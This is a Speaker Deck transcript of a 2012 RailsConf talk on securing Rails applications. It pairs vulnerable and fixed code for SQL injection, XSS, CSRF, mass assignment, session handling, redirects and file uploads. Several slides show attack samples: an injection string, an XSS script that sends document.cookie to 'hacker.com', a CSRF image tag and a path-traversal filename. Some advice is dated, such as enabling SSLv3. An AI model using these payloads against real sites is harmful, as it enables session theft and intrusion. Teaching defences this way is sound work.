Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing your site

Avatar for bob_p bob_p
April 23, 2012
Technology
6
1k

Securing your site

My talk on securing your rails app, from Rails Conf 2012.

Avatar for bob_p

bob_p

April 23, 2012
Tweet

Other Decks in Technology

See All in Technology
ClaudeCode_vs_GeminiCLI_Terraformで比較してみた
Avatar for t-kikuchi tkikuchi
1
3.6k
スプリントレビューを効果的にするために
Avatar for Miho Nagase miholovesq
4
1.1k
ABEMAの本番環境負荷試験への挑戦
Avatar for Miyazaki Taiga mk2taiga
5
1.6k
「Chatwork」のEKS環境を支えるhelmfileを使用したマニフェスト管理術
Avatar for hanayo04 hanayo04
1
440
Transformerを用いたアイテム間の 相互影響を考慮したレコメンドリスト生成
Avatar for Recruit recruitengineers
PRO
2
580
Deep Security Conference 2025:生成AI時代のセキュリティ監視 /dsc2025-genai-secmon
Avatar for Masayoshi Mizutani mizutani
5
3.6k
Introduction to Sansan, inc / Sansan Global Development Center, Inc.
Avatar for Sansan, Inc. sansan33
PRO
0
2.7k
How to Quickly Call American Airlines®️ U.S. Customer Care : Full Guide
Avatar for goldfinch3710 flyaahelpguide
0
240
Data Engineering Study#30 LT資料
Avatar for tetsuroito tetsuroito
1
470
Webの技術とガジェットで那須の子ども達にワクワクを! / IoTLT_20250720
Avatar for you(@youtoy) you
PRO
0
110
Bliki (ja), and the Cathedral, and the Bazaar
Avatar for Koichi ITO koic
6
800
Building GoReleaser - from shell script to paid product
Avatar for Carlos Alexandro Becker caarlos0
0
190

Featured

See All Featured
Code Reviewing Like a Champion
Avatar for maltzj maltzj
524
40k
How GitHub (no longer) Works
Avatar for Zach Holman holman
314
140k
Improving Core Web Vitals using Speculation Rules API
Avatar for Sergey Chernyshev sergeychernyshev
18
1k
The Web Performance Landscape in 2024 [PerfNow 2024]
Avatar for Tammy Everts tammyeverts
8
700
Rails Girls Zürich Keynote
Avatar for Gregor Martynus gr2m
95
14k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
Avatar for Kevin Liebholz kevinliebholz
34
5.9k
Git: the NoSQL Database
Avatar for Brandon Keepers bkeepers
PRO
431
65k
A Modern Web Designer's Workflow
Avatar for Chris Coyier chriscoyier
695
190k
Principles of Awesome APIs and How to Build Them.
Avatar for Keavy McMinn keavy
126
17k
Designing for Performance
Avatar for Lara Hogan lara
610
69k
The Art of Delivering Value - GDevCon NA Keynote
Avatar for David Neal reverentgeek
15
1.6k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
Avatar for Tammy Everts tammyeverts
53
2.9k

Transcript

  1. Securing your site. @bob_p

  2. How Secure?

  3. SQL injection

  4. http://xkcd.com/327/

  5. None

  6. User.where("email ='#{params[:email]}'").first User.first(:conditions => "email = '#{params[:email]}’") SELECT "users".* FROM

    "users" WHERE (email = '' OR 1='1') LIMIT 1

  7. User.find_by_email(params[:email]) User.where("email = ?", params[:email]).first User.first(:conditions => ["email = ?",

    params[:email]])

  8. Summary Sanitise all SQL input

  9. XSS <script>alert(‘h4x0r3d’);</script>

  10. <script>alert(‘h4x0r3d’);</script> <script>document.write(‘<img src="http:// hacker.com/' + document.cookie + '">’);</script> <iframe src=”http://hacker.com/hack”></iframe>

  11. cookies(:secure_cookie, :httponly => true, :secure => true) Secure your cookies

  12. html_escape(“<script></script>”) Escape output < 3

  13. “hello”.html_safe? SafeBuffer > 3

  14. raw(“<h1>hello</h1>”) > 3 SafeBuffer

  15. Summary Secure your cookies Ensure user submitted input is sanitised

  16. Session management

  17. Rails.application.config.session_store :cookie_store Rails.application.config.session_store :cache_store Rails.application.config.session_store :active_record_store Session stores

  18. config.secret_token = '3783262ab68df94a79ab0 2edca8a1a9c3....' `rake secret`

  19. XSS

  20. Insecure networks Image from http://codebutler.com/

  21. Rails.application.config.force _ssl = true

  22. Allow logout

  23. Timeout

  24. MyApp::Application.config.session_store :cookie_store, :key => ‘_my_key’, :expire_after => 45.minutes class User

    < ActiveRecord::Base devise :authenticatable, :timeoutable, :timeout_in => 45.minutes end

  25. reset_session

  26. No concurrent logins

  27. Account lockout

  28. Password complexity

  29. Destroy session on logout def logout reset_session end

  30. Hash passwords class User def password=(password) self.encrypted_password = ::BCrypt::Engine.hash_secret(password, self.salt)

    end end

  31. http://codahale.com/how-to-safely-store-a-password/ Use bcrypt

  32. large objects No

  33. critical data No

  34. Summary SSL Hash data Clear sessions

  35. Mass Assignment “public_key” => {“user_id” => 4223}

  36. https://github.com/blog/1068-public-key-security-vulnerability-and-mitigation

  37. def signup @user = User.create(params[:user]) end params[:user] = {:username =>

    “pwn3d”, :admin => true}

  38. class User attr_protected :admin end

  39. class User attr_accessible :email end config.active_record.whitelist_attributes = true

  40. class User attr_accessible :role, :as => :admin end

  41. User.create({:username => ‘Bob’, :role => “admin”}, :as => :admin)

  42. def signup @user = User.create(user_params) end def user_params params[:user].slice(:email) end

  43. https://github.com/rails/ strong_parameters

  44. Summary attr_accessible Slice pattern attr_protected

  45. Direct object reference /users/:id/posts/:post_id

  46. def create @user = User.find(params[:user_id]) @note = Note.create(:user => @user,

    :text => params[:text]) end

  47. def create @user = User.find(session[:user_id]) @note = @user.notes.create(:text => params[:text])

    end

  48. def show @note = Note.find(params[:id]) end

  49. def show @user = User.find(session[:user_id]) @note = @user.notes.find(params[:id]) end

  50. def show @user = User.find(session[:user_id]) @note = Note.find(params[:id]) if @note.editable_by?(@user)

    # Do things end end

  51. Summary Find users from session Use scoping methods

  52. CSRF <img src=”http://demo.com/notes/1/destroy” />

  53. <img src=”http://example.com/notes/1/destroy” />

  54. POST PUT DELETE GET Safe requests / queries Changes resource

    / orders

  55. <input name="authenticity_token" type="hidden" value="HmY6ZvG0Qq3X7nv1yKm54cv05mpnw" />

  56. class ApplicationController protect_from_forgery end

  57. Summary Correct http verbs Rails CSRF protection

  58. Redirection & file uploads

  59. def login login_business redirect_to params[:from] end

  60. def login login_business redirect_to session[:from] end

  61. Sanitise file names

  62. “../../../etc/passwd”

  63. https://github.com/thoughtbot/paperclip/blob/master/lib/paperclip/ attachment.rb#L435 def cleanup_filename(filename) filename.gsub(/[&$+,\/:;=?@<>\[\]\ {\}\|\\\^~%# ]/, ‘_’) end

  64. Sanitise file type

  65. class User validates_attachment :avatar, :presence => true, :content_type => {

    :content_type => "image/jpg" }, :size => { :in => 0..10.kilobytes } end

  66. Process asynchronously

  67. Summary No redirect locations in params Sanitise file name/type Process

    files a-sync

  68. SSL

  69. Rails.application.config.force _ssl = true

  70. ssl_ciphers HIGH:!aNULL:!MD5; ssl_protocols SSLv3 TLSv1;

  71. Summary Use SSL!

  72. Admin & intranet

  73. CSRF

  74. XSS

  75. Whistlist.contains? (request.remote_ip)

  76. Summary XSS / CSRF / Injection Restrict access

  77. Info leakage

  78. server_tokens off;

  79. None

  80. Summary Don’t give away anything

  81. Server-side

  82. User privileges

  83. config.filter_parameters += [:password]

  84. Summary Restrict user permissions Obscure sensitive data

  85. Resources

  86. guides.rubyonrails.org/security.html

  87. www.rorsecurity.info

  88. brakemanscanner.org

  89. github.com/relevance/tarantula

  90. www.owasp.org

  91. @bob_p http://mintdigital.com ColorPalette: http://www.colourlovers.com/lover/electrikmonk/loveNote Thanks!